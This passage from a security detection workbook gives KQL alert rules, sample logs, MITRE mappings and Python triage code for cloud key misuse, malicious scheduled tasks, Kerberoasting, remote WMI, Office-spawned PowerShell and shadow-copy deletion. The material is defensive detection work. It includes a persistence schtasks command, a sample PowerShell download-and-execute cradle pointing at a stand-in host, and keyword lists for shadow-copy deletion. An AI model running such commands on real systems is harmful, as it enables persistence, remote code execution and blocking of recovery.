Objective: Detect the use of cloud API keys, service account tokens or OAuth tokens from
unexpected geographies, IP ranges or platforms, which could indicate leaked credentials,
token theft or initial access by adversaries.
Data Sources:
• Cloud audit logs (AWS CloudTrail, Azure Activity Logs, GCP Cloud Audit Logs)
• Identity provider logs (example, Okta, Azure AD for service principal activity)
• Threat intelligence feeds (for IP/ASN context)
• UEBA (behavioural anomaly platforms)
Detection Logic (KQL – Cloud Audit + IP/Geo Check):
let KnownTrustedIPs = dynamic(["203.0.113.10"]);   // placeholder: your egress IPs, better kept in a watchlist
let HomeCountries = dynamic(["Malaysia", "Singapore"]);   // placeholder: countries where the key is expected to be used
CloudAuditLogs
| where IdentityType in ("APIKey", "ServiceAccount")
| where SourceIPAddress !in (KnownTrustedIPs)
| where Country !in (HomeCountries)
| summarize Count = count() by APIKeyID, UserAgent, SourceIPAddress, Country, bin(TimeGenerated, 15m)
| where Count > 2
| extend Alert = "API key or token usage from unusual location"
Country is not a native field in CloudTrail or Azure Activity Logs; derive it with geo_info_from_ip_address(SourceIPAddress) or in your enrichment pipeline before this filter.
Alternate (Token Reuse Across Regions):
• Detect if the same API key is used from two different countries within an hour.
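Worked example, added here as an illustration and not taken from the workbook or from any cloud provider's SDK: both rules above, the per-window count from untrusted locations and the alternate "same key from two countries within an hour", run in Python over constructed audit events. The trusted-IP set, home-country list, key names, addresses and the sensitive-action list are assumptions chosen to match the query's placeholders.

```python
"""Geo/IP anomaly checks for API-key usage over constructed cloud audit events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Placeholders standing in for the workbook's KnownTrustedIPs and home-country list.
TRUSTED_IPS = {"203.0.113.10"}
HOME_COUNTRIES = {"Malaysia", "Singapore"}
SENSITIVE_ACTIONS = {"DeleteBucket", "CreateRole", "AttachPolicy", "PutBucketPolicy"}

_T = datetime(2025, 4, 23, 8, 0, 0)


def _ev(minutes, key, itype, ip, country, action, ua):
    return {"TimeGenerated": _T + timedelta(minutes=minutes), "APIKeyID": key, "IdentityType": itype,
            "SourceIPAddress": ip, "Country": country, "Action": action, "UserAgent": ua}


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    _ev(0,  "svc-backup-key-8762", "ServiceAccount", "203.0.113.10",  "Malaysia", "ListBuckets", "aws-sdk-go/1.38.7"),
    _ev(20, "svc-backup-key-8762", "ServiceAccount", "190.89.112.13", "Russia",   "ListBuckets", "aws-sdk-go/1.38.7"),
    _ev(21, "svc-backup-key-8762", "ServiceAccount", "190.89.112.13", "Russia",   "GetObject",   "aws-sdk-go/1.38.7"),
    _ev(22, "svc-backup-key-8762", "ServiceAccount", "190.89.112.13", "Russia",   "GetObject",   "aws-sdk-go/1.38.7"),
    _ev(25, "svc-backup-key-8762", "ServiceAccount", "190.89.112.13", "Russia",   "CreateRole",  "aws-sdk-go/1.38.7"),
    # one-off use of a CI key from a foreign datacentre: below the count threshold, single country
    _ev(10, "ci-deploy-key-1122", "APIKey", "198.51.100.7", "Germany", "ListBuckets", "aws-cli/2.15.0"),
    # an interactive user abroad is out of scope for this rule
    _ev(30, "n/a", "User", "190.89.112.13", "Russia", "ConsoleLogin", "Mozilla/5.0"),
]


def bucket(ts, minutes):
    """Floor a timestamp to a fixed window, like KQL bin()."""
    return ts.replace(minute=ts.minute - ts.minute % minutes, second=0, microsecond=0)


def unusual_location(events, window_min=15, min_count=2):
    """The workbook's query: non-interactive identities, untrusted IP, foreign country, >min_count per bin."""
    groups = defaultdict(list)
    for e in events:
        if e["IdentityType"] not in ("APIKey", "ServiceAccount"):
            continue
        if e["SourceIPAddress"] in TRUSTED_IPS or e["Country"] in HOME_COUNTRIES:
            continue
        key = (e["APIKeyID"], e["UserAgent"], e["SourceIPAddress"], e["Country"],
               bucket(e["TimeGenerated"], window_min))
        groups[key].append(e)
    alerts = []
    for (key_id, ua, ip, country, window), evs in groups.items():
        if len(evs) > min_count:
            alerts.append({"APIKeyID": key_id, "UserAgent": ua, "SourceIPAddress": ip, "Country": country,
                           "Window": window, "Count": len(evs),
                           # surface high-impact calls so the analyst sees them without a second query
                           "SensitiveActions": sorted({e["Action"] for e in evs} & SENSITIVE_ACTIONS)})
    return alerts


def multi_country_reuse(events, window_minutes=60):
    """The alternate logic: the same key observed from two countries within the window."""
    window = timedelta(minutes=window_minutes)
    by_key = defaultdict(list)
    for e in events:
        if e["IdentityType"] in ("APIKey", "ServiceAccount"):
            by_key[e["APIKeyID"]].append((e["TimeGenerated"], e["Country"]))
    hits = []
    for key_id, seen in by_key.items():
        seen.sort()
        for i, (t0, c0) in enumerate(seen):
            for t1, c1 in seen[i + 1:]:
                if t1 - t0 > window:
                    break                      # events are sorted, nothing later can be closer
                if c1 != c0 and (key_id, c0, c1) not in hits:
                    hits.append((key_id, c0, c1))
    return hits


if __name__ == "__main__":
    for a in unusual_location(SAMPLE_EVENTS):
        print(a)
    print(multi_country_reuse(SAMPLE_EVENTS))
```

The backup key trips both rules: four calls from one untrusted foreign IP inside a single 15-minute bin, with CreateRole flagged as a sensitive action, and a Malaysia-to-Russia hop 20 minutes apart. The CI key's single German call stays below the count threshold and never shows a second country, which is the kind of event worth a watchlist entry rather than an alert.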
MITRE ATT&CK Mapping
Tactic Initial Access, Defense Evasion
Techniques T1538 – Cloud Service Dashboard
T1528 – Steal Application Access Token (where OAuth or session tokens are stolen rather than static keys)
T1078.004 – Valid Accounts: Cloud Accounts
Explanation:
API keys and OAuth tokens, if leaked (example, via GitHub, browser compromise,
unsecured S3 buckets), are often abused by attackers to access cloud workloads,
exfiltrate data or alter configurations.
Cloud Audit Log Entry
{
"TimeGenerated": "2025-04-23T08:20:45Z",
"APIKeyID": "svc-backup-key-8762",
"IdentityType": "ServiceAccount",
"Action": "ListBuckets",
"Resource": "s3://company-archives",
"SourceIPAddress": "190.89.112.13",
"Country": "Russia",
"UserAgent": "aws-sdk-go/1.38.7",
"Platform": "Unknown"
}
Threat Behavior Indicators
• First-time use of API key from foreign country or datacenter IP
• Access attempt shortly after GitHub or CI/CD code update
• High-sensitivity actions (example, DeleteBucket, CreateRole, AttachPolicy)
• Burst of usage patterns (example, mass downloads, CLI usage)
Response Actions
1. Immediately revoke the affected API key or token
2. Audit access logs to identify what resources were accessed or altered
3. Search code repositories and collaboration platforms for credential leaks
4. Enforce short-lived token rotation and IP restriction policies
5. Implement automated anomaly detection based on geo-IP and time-based usage
6. Use secrets scanning tools (example, TruffleHog, GitGuardian) on developer
pipelines
44. Alert Name: Malicious Scheduled Task Dropped via Living-off-the-Land Binaries
(LOLBins)
Alert Logic
Objective: Detect suspicious creation of scheduled tasks using native Windows tools
(LOLBins) like schtasks.exe, powershell.exe or cmd.exe, which adversaries often leverage
to maintain persistence or automate payload execution.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• Windows Security Logs (Event ID 4698 – Scheduled Task Created)
• EDR telemetry with process lineage visibility
Detection Logic (KQL – Sysmon + Command Line Anomalies):
DeviceProcessEvents
| where FileName in~ ("schtasks.exe", "powershell.exe", "cmd.exe")
| where ProcessCommandLine contains "/create" and ProcessCommandLine has_any (".bat", ".vbs", ".ps1", ".exe")
| where InitiatingProcessAccountName !contains "admin" and InitiatingProcessAccountName !startswith "svc"
| extend Alert = "Malicious scheduled task potentially created via LOLBin"
The account-name filter is only a heuristic (an attacker operating as a compromised admin passes it); treat it as a noise reducer, not a trust decision.
Alternate (Event ID 4698 – Task Creation via Suspicious Path):
SecurityEvent
| where EventID == 4698
| where TaskContent has_any ("AppData", "Temp", "curl", "Invoke-WebRequest")
| extend Alert = "Suspicious scheduled task targeting non-system location"
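Worked example, added here as an illustration and not part of the original workbook: the command-line indicators from the rule above (user-writable paths, ExecutionPolicy Bypass, encoded commands, download cradles, logon/boot triggers, highest run level and the account heuristic) implemented in Python as a small schtasks parser and scorer. The option grammar, the indicator lists, the scoring scheme and the benign sample task are assumptions; the malicious sample is the workbook's own command line.

```python
"""Parse and score schtasks /create command lines from process telemetry (added example)."""
import re

# One /option with an optional value; values may be "quoted", 'quoted' or bare.
_OPT_RE = re.compile(r"""/(\w+)(?:\s+("[^"]*"|'[^']*'|[^/\s"']\S*))?""")
# Locations and tokens the workbook lists as suspicious (heuristics, not proof).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "curl ", "certutil", "bitsadmin",
                   "downloadstring", "downloadfile")


def parse_schtasks(cmdline):
    """Return {option: value-or-True} for a schtasks command line, options lower-cased."""
    opts = {}
    for m in _OPT_RE.finditer(cmdline):
        name, value = m.group(1).lower(), m.group(2)
        if value is not None and value[0] in "\"'":
            value = value[1:-1]                 # strip the surrounding quotes
        opts[name] = True if value is None else value
    return opts


def is_admin_or_service(account):
    """The workbook's name-based heuristic; replace with group membership in production."""
    a = account.lower()
    return "admin" in a or a.startswith("svc")


def score_task(cmdline, account):
    """Score a task-creation command line; None if it is not a /create."""
    opts = parse_schtasks(cmdline)
    if "create" not in opts:
        return None
    run = opts.get("tr")
    run = run.lower() if isinstance(run, str) else ""
    reasons = []
    if any(d in run for d in USER_WRITABLE):
        reasons.append("action in user-writable directory")
    if re.search(r"-(?:executionpolicy|ep)\s+bypass", run):
        reasons.append("ExecutionPolicy Bypass")
    if re.search(r"\s-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}", run):
        reasons.append("encoded PowerShell command")
    if any(t in run for t in DOWNLOAD_TOKENS):
        reasons.append("download cradle")
    schedule = opts.get("sc")
    if isinstance(schedule, str) and schedule.lower() in ("onlogon", "onstart"):
        reasons.append(f"trigger {schedule.lower()}")
    level = opts.get("rl")
    if isinstance(level, str) and level.lower() == "highest":
        reasons.append("runs with highest privileges")
    if not is_admin_or_service(account):
        reasons.append("created by non-admin account")
    return {"task": opts.get("tn"), "score": len(reasons), "reasons": reasons}


# Constructed samples: the workbook's malicious task and a benign backup job.
MALICIOUS = (r"schtasks /create /tn 'WinUpdateChecker' /tr 'powershell.exe -ExecutionPolicy Bypass "
             r"-File C:\Users\roslan\AppData\Local\runme.ps1' /sc onlogon /rl highest")
BENIGN = r'schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\bk.exe" /sc daily /st 02:00'

if __name__ == "__main__":
    print(score_task(MALICIOUS, "roslan.halim"))
    print(score_task(BENIGN, "svc_backup"))
```

The parser keeps a quoted /tr value intact even though it contains spaces and a path, which is what a has_any() over the raw command line cannot do; scoring on the parsed fields also lets you weight /rl highest and /sc onlogon separately from the action path. Unquoted values containing forward slashes (rare on Windows) would be split by this grammar, so quote them in test data.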
MITRE ATT&CK Mapping
Tactic Persistence, Execution
Techniques T1053.005 – Scheduled Task/Job: Scheduled Task
T1218 – System Binary Proxy Execution (LOLBins)
Explanation:
LOLBins allow adversaries to blend into legitimate system processes while creating
scheduled tasks that execute malware, scripts or download payloads at reboot or set
intervals.
EDR Log Entry (Scheduled Task via schtasks.exe)
{
"TimeGenerated": "2025-04-23T08:35:11Z",
"DeviceName": "ENG-LAPTOP37",
"InitiatingProcessAccountName": "roslan.halim@company.com",
"FileName": "schtasks.exe",
"ProcessCommandLine": "schtasks /create /tn 'WinUpdateChecker' /tr 'powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\roslan\\AppData\\Local\\runme.ps1' /sc onlogon /rl highest",
"ParentProcessName": "cmd.exe"
}
Threat Behavior Indicators
• Scheduled task references AppData, Temp or other user-writable directories
• Created with -ExecutionPolicy Bypass, curl or encoded commands
• Triggered on login or system boot using LOLBins
• Created by standard user account or compromised endpoint
Response Actions
1. Delete the scheduled task immediately and extract the target script or binary
2. Scan the host for additional persistence mechanisms or dropper artefacts
3. Check for lateral movement or task propagation to other endpoints
4. Harden endpoint controls to restrict task creation to admin accounts only
5. Deploy detection rules for LOLBin abuse across all hosts
6. Correlate with phishing emails, macro execution or initial access timeline
45. Alert Name: Abnormal Azure Resource Creation by Privileged Identity
Alert Logic
Objective: Detect unexpected or anomalous creation of cloud infrastructure resources
(VMs, Storage, Networking, Roles) in Azure by high-privilege identities, a tactic used for
persistence, resource hijacking or stealthy lateral movement.
Data Sources:
• Azure Activity Logs
• Azure Resource Graph / Defender for Cloud
• Azure AD Sign-in logs
• SIEM or CSPM enrichment (with user privilege tags)
Detection Logic (KQL – Azure Activity + Identity Context):
AzureActivity
| where OperationNameValue in~ ("MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE", "MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE", "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE", "MICROSOFT.KEYVAULT/VAULTS/WRITE")
| where ActivityStatusValue =~ "Success"   // one record per completed operation, not the Start/Accept records
| where IdentityLevel in ("GlobalAdmin", "PrivilegedRole")   // enrichment column from your privilege tagging; not native to AzureActivity
| where Caller !in ("automated-deploy-user", "infra-admin-svc")   // placeholder exclusions for known automation identities
| summarize Actions = count() by Caller, ResourceGroup, OperationNameValue, bin(TimeGenerated, 15m)
| where Actions > 3
| extend Alert = "Abnormal Azure resource creation by privileged identity"
OperationNameValue carries the stable resource-provider operation name; the display-name column (OperationName) changes wording between portal releases, so rules keyed on it drift silently.
Alternate Logic (Out-of-Region Creation):
• Flag new Azure resources created from locations/IPs not associated with the user’s
historical access.
MITRE ATT&CK Mapping
Tactic Persistence, Defense Evasion
Techniques T1078.004 – Valid Accounts: Cloud Accounts
T1136.003 – Create Account: Cloud Account
T1098.003 – Account Manipulation: Additional Cloud Roles
Explanation:
Threat actors with compromised privileged accounts may create backdoor resources
(example, hidden VMs, custom roles, invisible key vaults) for persistence, data access or
stealth control.
Azure Activity Log Entry
{
"TimeGenerated": "2025-04-23T08:50:00Z",
"Caller": "faridah.ismail@company.com",
"OperationName": "Create Virtual Machine",
"ResourceGroup": "Production-EU",
"Region": "East US",
"IPAddress": "203.111.45.78",
"IdentityLevel": "GlobalAdmin",
"Status": "Success"
}
Threat Behavior Indicators
• Unusual region or subscription for new resource creation
• Creation of VMs with outbound access but no logging/monitoring
• Role assignments to service principals not in policy
• Sudden burst of create operations without change ticket or justification
Response Actions
1. Review the created resources immediately; isolate or delete them if malicious
2. Audit the actor’s activity for signs of compromise (example, impossible travel,
lateral movement)
3. Enable Microsoft Defender for Cloud (formerly Azure Defender) policies to block risky configurations
4. Implement change control for resource creation by privileged users
5. Correlate with identity provider logs for suspicious sign-ins
6. Set up custom detection for privileged operations across all regions
46. Alert Name: Kerberoasting Attempt Detected via High Volume of TGS Requests
Alert Logic
Objective: Detect Kerberoasting attacks, where adversaries request Kerberos Ticket
Granting Service (TGS) tickets for service accounts in Active Directory, with the goal of
extracting and cracking them offline to gain lateral access or privilege escalation.
Data Sources:
• Windows Security Logs (Event ID 4769 – TGS Request Issued)
• Domain Controller logs
• SIEM with correlation capabilities
• AD user metadata (to identify service accounts)
Detection Logic (KQL – Volume-Based):
SecurityEvent
| where EventID == 4769
| where ServiceName !~ "krbtgt" and ServiceName !endswith "$"   // skip TGT renewals and machine accounts (long random passwords, not crackable)
| where TicketEncryptionType in ("0x17", "0x18")   // RC4-HMAC / RC4-HMAC-EXP; AES128 and AES256 tickets are 0x11 / 0x12
| summarize TGSRequestCount = count(), DistinctServices = dcount(ServiceName) by TargetUserName, IpAddress, bin(TimeGenerated, 10m)
| where TGSRequestCount > 20 and DistinctServices > 10
| extend Alert = "Possible Kerberoasting attempt (abnormal TGS request volume)"
In Event ID 4769, TargetUserName is the requesting account and ServiceName is the service account the ticket was issued for; the SPN string itself is not logged, so resolve it from the account's servicePrincipalName attribute during triage. A domain that still allows RC4 for service accounts will also issue legitimate 0x17 tickets, so tune on volume and breadth rather than on encryption type alone.
Alternate (Single Host SPN Sweep):
• Alert if >10 service accounts are requested from the same host in <5 minutes.
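Worked example, added here as an illustration and not part of the original workbook: the fixed-bin volume rule above and the alternate sliding-window "SPN sweep" rule, run in Python over constructed Event ID 4769 records. Field names follow the Sentinel SecurityEvent columns (TargetUserName = requester, ServiceName = service account); the account names, addresses, timings and thresholds are assumptions.

```python
"""Kerberoasting heuristics over constructed Event ID 4769 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_TYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP; AES128/AES256 are 0x11/0x12
_T = datetime(2025, 4, 23, 9, 5, 0)


def _tgs(offset_s, requester, service, etype, ip):
    # Field names follow Sentinel's SecurityEvent columns for Event ID 4769:
    # TargetUserName is the requesting account, ServiceName the service account.
    return {"EventID": 4769, "TimeGenerated": _T + timedelta(seconds=offset_s), "TargetUserName": requester,
            "ServiceName": service, "TicketEncryptionType": etype, "IpAddress": ip}


SERVICE_ACCOUNTS = [f"svc_sql{n:02d}" for n in range(1, 16)] + [f"svc_web{n:02d}" for n in range(1, 11)]

# Constructed sample (not real logs): one workstation sweeps 25 service accounts with RC4 in four minutes.
SAMPLE_EVENTS = (
    [_tgs(10 * i, "roslan.halim@CORP.COMPANY.COM", s, "0x17", "10.1.22.40") for i, s in enumerate(SERVICE_ACCOUNTS)]
    # TGT renewal and machine-account tickets from the same host are not crackable targets
    + [_tgs(0, "roslan.halim@CORP.COMPANY.COM", "krbtgt", "0x12", "10.1.22.40")]
    + [_tgs(i, "roslan.halim@CORP.COMPANY.COM", "FS01$", "0x17", "10.1.22.40") for i in range(30)]
    # a normal user reaching five AES-protected services over five minutes
    + [_tgs(60 * i, "aisyah.abdullah@CORP.COMPANY.COM", f"svc_app{i}", "0x12", "10.1.22.50") for i in range(5)]
)


def bucket(ts, minutes):
    """Floor a timestamp to a fixed window, like KQL bin()."""
    return ts.replace(minute=ts.minute - ts.minute % minutes, second=0, microsecond=0)


def _roastable(e):
    svc = e["ServiceName"]
    return e["EventID"] == 4769 and svc.lower() != "krbtgt" and not svc.endswith("$")


def detect_volume(events, window_min=10, min_requests=20, min_services=10, rc4_only=True):
    """The workbook's query: TGS count and distinct service accounts per requester/IP per bin."""
    stats = defaultdict(lambda: [0, set()])
    for e in filter(_roastable, events):
        if rc4_only and e["TicketEncryptionType"] not in RC4_TYPES:
            continue
        key = (e["TargetUserName"], e["IpAddress"], bucket(e["TimeGenerated"], window_min))
        stats[key][0] += 1
        stats[key][1].add(e["ServiceName"])
    return [{"TargetUserName": k[0], "IpAddress": k[1], "Window": k[2],
             "TGSRequestCount": n, "DistinctServices": len(s)}
            for k, (n, s) in stats.items() if n > min_requests and len(s) > min_services]


def spn_sweep(events, window_minutes=5, min_services=10):
    """Alternate logic with a sliding window: >min_services distinct service accounts from one host in < window."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for e in filter(_roastable, events):
        by_host[e["IpAddress"]].append((e["TimeGenerated"], e["ServiceName"]))
    hits = {}
    for host, seen in by_host.items():
        seen.sort()
        start, live = 0, defaultdict(int)
        for t_end, svc in seen:
            live[svc] += 1
            while t_end - seen[start][0] >= window:   # drop events that fell out of the window
                old = seen[start][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                start += 1
            if len(live) > min_services:
                hits[host] = max(hits.get(host, 0), len(live))
    return hits


if __name__ == "__main__":
    print(detect_volume(SAMPLE_EVENTS))
    print(spn_sweep(SAMPLE_EVENTS))
```

The 30 RC4 tickets for the machine account FS01$ would inflate the request count to 55 without the "$" exclusion, yet add nothing an attacker can crack; dropping them keeps the count honest at 25. The sliding window catches a sweep that straddles a fixed 10-minute bin boundary, which the binned query would split into two sub-threshold halves.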
MITRE ATT&CK Mapping
Tactic Credential Access
Techniques T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting
Explanation:
Kerberoasting exploits the ability of any AD user to request service tickets. Attackers then
extract the tickets, attempt offline brute-force or dictionary attacks and impersonate
service accounts if successful.
Log Entry (Event ID 4769 – TGS Request)
{
"EventID": 4769,
"TimeGenerated": "2025-04-23T09:05:17Z",
"TargetUserName": "roslan.halim@CORP.COMPANY.COM",
"ServiceName": "svc_sqlprod",
"TicketEncryptionType": "0x17",
"IpAddress": "10.1.22.40",
"ClientHostName": "ENG-LAPTOP37"
}
(Repeat across 25 service accounts in <10 minutes from the same host)
Threat Behavior Indicators
• High volume of TGS requests from single IP or user
• Targets multiple high-value SPNs (example, MSSQLSvc, HTTP, CIFS)
• Requests use RC4 encryption (easier to brute-force than AES)
• No follow-up access to the services themselves, only ticket collection
Response Actions
1. Investigate the source host for credential dumping or recon activity
2. Correlate with abnormal logons or PowerShell enumeration tools (example,
PowerView)
3. Reset passwords for exposed service accounts and restrict them to AES (msDS-SupportedEncryptionTypes) so RC4 tickets are no longer issued for them
4. Monitor LSASS access attempts and memory scraping
5. Implement AD hardening: use strong passwords and Managed Service Accounts
(gMSAs)
6. Enable auditing and alerting on TGS volume per host/user over time
47. Alert Name: Suspicious Use of Remote WMI Execution Across Endpoints
Alert Logic
Objective: Detect use of Windows Management Instrumentation (WMI) for remote
command execution, often leveraged by adversaries during lateral movement or stealthy
administration without writing to disk.
Data Sources:
• Sysmon (Event ID 1 – Process Creation, Event ID 3 – Network Connection)
• Windows Security Logs (Event ID 4688 – Process Creation)
• EDR (CrowdStrike, Defender for Endpoint, SentinelOne)
• WMI-Activity logs (Microsoft-Windows-WMI-Activity/Operational)
Detection Logic (KQL – Process + Network Behaviour):
DeviceProcessEvents
| where FileName in~ ("wmic.exe", "powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("Invoke-WmiMethod", "Get-WmiObject", "Invoke-CimMethod", "winmgmts") or ProcessCommandLine contains "/node:"
| extend TargetHost = extract("(?i)(?:/node:|-ComputerName\\s+)[\"']?([\\w.-]+)", 1, ProcessCommandLine)
| where isnotempty(TargetHost) and TargetHost !in~ (".", "localhost")
| summarize WMIExecutions = count(), TargetHosts = dcount(TargetHost) by DeviceName, InitiatingProcessAccountName, bin(TimeGenerated, 10m)
| where TargetHosts > 3
| extend Alert = "Suspicious remote WMI execution across multiple endpoints"
Counting distinct command lines as a proxy for targets over-counts when one host is hit with several different commands; extracting the /node: or -ComputerName value gives a real target count.
Alternate (Sysmon + WMI Provider Host):
let AllowedWmiChildren = dynamic(["C:\\Program Files\\YourMonitoringAgent\\agent.exe"]);   // placeholder: binaries your tooling legitimately launches under WmiPrvSE.exe
Sysmon
| where EventID == 1
| where ParentImage endswith "WmiPrvSE.exe"
| where Image endswith ".exe" and Image !in~ (AllowedWmiChildren)
MITRE ATT&CK Mapping
Tactic Lateral Movement
Techniques T1047 – Windows Management Instrumentation
T1021 – Remote Services
Explanation:
Remote WMI execution allows adversaries to interact with remote systems for fileless
execution, process manipulation or reconnaissance, all without relying on PsExec or RDP.
WMI Log (Sysmon + PowerShell)
{
"TimeGenerated": "2025-04-23T09:20:22Z",
"DeviceName": "FINANCE-LAPTOP17",
"UserName": "shafiq.azmi@company.com",
"ProcessName": "powershell.exe",
"CommandLine": "Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList 'notepad.exe' -ComputerName HR-WS03"
}
(Executed across 5 different endpoints in 10 minutes)
Threat Behavior Indicators
• Remote WMI execution targeting multiple hosts from a user workstation
• Use of scripting engines or LOLBins (example, PowerShell, wmic.exe)
• No ticket, task or change request associated with the activity
• Followed by lateral tool usage (example, token theft, recon or malware drops)
Response Actions
1. Investigate the source user and device for signs of compromise
2. Review the processes spawned remotely via WMI (example, cmd.exe,
powershell.exe)
3. Restrict WMI remote execution via GPO or firewall rules
4. Alert on WMI execution outside admin jump hosts or designated automation tools
5. Check for correlation with other lateral movement indicators (PsExec, RDP, WinRM)
6. Enable logging for WMI-Activity and centralise to SIEM for real-time alerting
48. Alert Name: Suspicious Process Chain Involving Office Application Spawning
PowerShell
Alert Logic
Objective: Detect when Microsoft Office applications (example, winword.exe, excel.exe,
powerpnt.exe) spawn PowerShell, which is a common behaviour in macro-based attacks,
phishing payloads and fileless malware execution.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• EDR process tree data
• PowerShell ScriptBlock Logging (Event ID 4104)
• Windows Security Logs (Event ID 4688)
Detection Logic (KQL – Sysmon / EDR):
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe")
| extend Alert = "Office app spawning PowerShell (suspicious process chain)"
In DeviceProcessEvents the parent is InitiatingProcessFileName; there is no ParentProcessName column in that table.
Enhanced Logic (Script Content + Execution Policy Flags):
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "FromBase64String", "-nop", "-w hidden", "-windowstyle hidden")
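Worked example, added here as an illustration and not part of the original workbook: a Python triage routine for the process chain above that recognises the Office parent, the evasion flags, decodes the -EncodedCommand payload (base64 over UTF-16LE, which is why the page's sample begins with "JAB1AHIAbAAgAD0A", the encoding of "$url = ") and looks for download cradles in the decoded script. The parent list, flag and cradle tables, the scoring and the sample script (which points at a reserved .invalid hostname) are assumptions.

```python
"""Decode and triage PowerShell -EncodedCommand launches from Office parents (added example)."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Common abbreviations of -EncodedCommand; PowerShell accepts any unambiguous prefix.
_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Evasion flags (checked on the lower-cased command line) and download/execution cradles
# (checked on the decoded script).
EVASION_FLAGS = {"-nop": "no profile", "-noni": "non-interactive", "-w hidden": "hidden window",
                 "-windowstyle hidden": "hidden window", "-ep bypass": "execution policy bypass",
                 "-executionpolicy bypass": "execution policy bypass"}
CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient",
           "invoke-expression", "iex ", "frombase64string", "start-bitstransfer")


def encode_command(script):
    """What the attacker (or an admin) does: UTF-16LE script, base64 encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)                # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):       # not base64 or not UTF-16LE: still report the flag
        return ""


def analyse(cmdline, parent):
    """Score one process-creation event: Office parent, evasion flags, encoded payload, cradles."""
    findings = []
    if parent.lower() in OFFICE_PARENTS:
        findings.append(f"spawned by {parent.lower()}")
    low = cmdline.lower()
    for flag, desc in EVASION_FLAGS.items():
        if flag in low and desc not in findings:   # long and short spellings count once
            findings.append(desc)
    decoded = decode_encoded(cmdline)
    if decoded is not None:
        findings.append("encoded command")
        for token in CRADLES:
            if token in decoded.lower():
                findings.append(f"cradle: {token.strip()}")
    return {"decoded": decoded, "findings": findings, "score": len(findings)}


# Constructed sample matching the workbook's "JAB1AHIAbAAgAD0A..." prefix ("$url = " in UTF-16LE).
SCRIPT = "$url = 'http://example.invalid/p.ps1'; IEX (New-Object Net.WebClient).DownloadString($url)"
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -enc {encode_command(SCRIPT)}"

if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE, "winword.exe")
    print(result["decoded"])
    print(result["score"], result["findings"])
```

Decoding is the step that turns "encoded PowerShell under Word" into a concrete indicator (the download host and the cradle used), which is what the hash-and-domain triage in the response actions needs. A blob that fails to decode is still reported as an encoded launch, since a malformed -enc argument from an Office parent is itself abnormal.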
MITRE ATT&CK Mapping
Tactic Execution, Defense Evasion
Techniques T1059.001 – PowerShell
T1204.002 – User Execution: Malicious File (macro-enabled document; T1203 applies only when the document exploits a parser bug rather than relying on a macro)
T1027 – Obfuscated Files or Information
Explanation:
Malicious documents (often delivered via phishing) embed macros that silently launch
PowerShell for further exploitation, usually leading to malware download, lateral movement
or C2 beaconing.
Process Execution Chain
[
{
"TimeGenerated": "2025-04-23T09:35:08Z",
"ParentProcess": "winword.exe",
"ProcessName": "powershell.exe",
"UserName": "aisyah.abdullah@company.com",
"CommandLine": "powershell.exe -nop -w hidden -enc JAB1AHIAbAAgAD0A..."
}
]
Threat Behavior Indicators
• Office applications launching PowerShell or cmd.exe directly
• PowerShell command includes -enc, -nop, -w hidden or base64 string
• No legitimate macro use in the document (example, finance template spawning
script)
• Process tree shows PowerShell → download utility or LOLBin
Response Actions
1. Isolate the endpoint and extract the malicious document
2. Decode PowerShell command and inspect for malicious behaviour
3. Alert security teams to phishing campaign indicators (email source, attachment
hash)
4. Restrict macro execution via GPO or use "Block all macros with notification" policy
5. Enable Office AMSI integration and ScriptBlock Logging in PowerShell
6. Educate users to never enable macros unless explicitly approved by IT
49. Alert Name: Anomalous Volume Shadow Copy Deletion (Anti-Recovery Behavior)
Alert Logic
Objective: Detect attempts to delete Volume Shadow Copies (VSS), which are used by
Windows for backup and restore. This behaviour is often linked to ransomware, as it
prevents recovery without external backups.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• EDR tools (Defender for Endpoint, SentinelOne, CrowdStrike)
• Windows Security Logs (Event ID 4688 – Process Creation)
Detection Logic (KQL – Sysmon / EDR Execution Monitoring):
DeviceProcessEvents
| where FileName in~ ("vssadmin.exe", "wmic.exe", "powershell.exe", "wbadmin.exe")
| where ProcessCommandLine has_any ("delete shadows", "shadowcopy delete", "resize shadowstorage", "Disable-ComputerRestore", "delete catalog")
| extend Alert = "Volume Shadow Copy deletion attempt detected"
"vssadmin resize shadowstorage" with a small /maxsize is a quieter way to purge shadow copies than an explicit delete, and "wbadmin delete catalog" removes the Windows Backup catalog; both belong in the same rule.
